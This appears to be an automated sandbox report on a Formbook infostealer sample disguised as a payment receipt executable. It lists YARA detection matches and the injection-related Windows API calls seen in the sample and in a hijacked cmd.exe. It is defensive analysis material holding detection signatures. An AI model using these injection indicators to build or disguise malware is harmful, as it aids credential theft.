          Source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,GetEncryptedFileVersionExt,DeleteFileA,CopyFileA,GetEncryptedFileVersionExt,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004047D3
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004061D4
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_73653070
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_73655AC4
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_73655AD3
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_736530BA
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041C9AF
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041C9BB
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041BA2C
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00408C70
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041BD2B
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00402D8B
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097B090
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A320A8
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009920A0
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A328EC
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A3E824
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21002
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096F900
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00984120
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A322AE
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099EBB0
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2DBD2
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A32B28
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097841F
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2D466
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992581
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097D5E0
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A325DD
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A32D07
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00960D20
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A31D55
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A32EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AD803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AE040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A48E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A9CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B1969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A7190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A5226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AFA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A5E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A8AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002ACB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B5FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE2EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE22AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C36E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CDDBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE1FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4EBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE2B28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C420A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE20A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2D5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE1D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE2D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C10D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C34120
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: String function: 0096B150 appears 34 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02C1B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041867B NtReadFile,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_004186FA NtReadFile,NtClose,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009AB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009AA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009AAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AB4F8 NtQueryInformationToken,NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AB4C0 NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002CB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C9AB4 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C599A0 NtCreateSection,LdrInitializeThunk,
